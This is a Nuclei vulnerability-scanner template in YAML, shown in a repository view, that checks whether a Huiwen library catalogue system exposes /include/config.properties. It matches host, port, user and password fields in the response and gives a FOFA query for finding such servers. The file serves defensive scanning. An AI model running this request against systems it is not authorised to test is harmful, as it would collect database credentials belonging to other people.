nuclei-templates/http/vulnerabilities/other/huiwen-bibliographic-info-l...

37 lines
1.0 KiB
YAML
Raw Normal View History

2023-09-06 19:45:50 +00:00
id: huiwen-bibliographic-info-leak
info:
name: Huiwen library bibliographic Retrieval System - Information Exposure
author: SleepingBag945
severity: high
description: |
Huiwen library bibliographic retrieval system /include/config.properties file contains sensitive information, attackers can directly access to obtain information
metadata:
2023-10-14 11:27:55 +00:00
verified: true
2023-09-06 19:45:50 +00:00
max-request: 1
fofa-query: app="汇文软件-书目检索系统"
tags: huiwen,exposure,misconfig
http:
- raw:
- |
GET /include/config.properties HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "host="
- "port="
- "user="
- "password="
part: body
condition: and
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
# digest: 4a0a004730450221009276ec63be07e4e125815e320a1ceaaeca3429de1e31c3d944f149edfd3a06500220256c8533dc8a7c0d51ae67c88427c71cafc3385d4f20344d9357248cb938b9f8:922c64590222798bb761d5b6d8e72950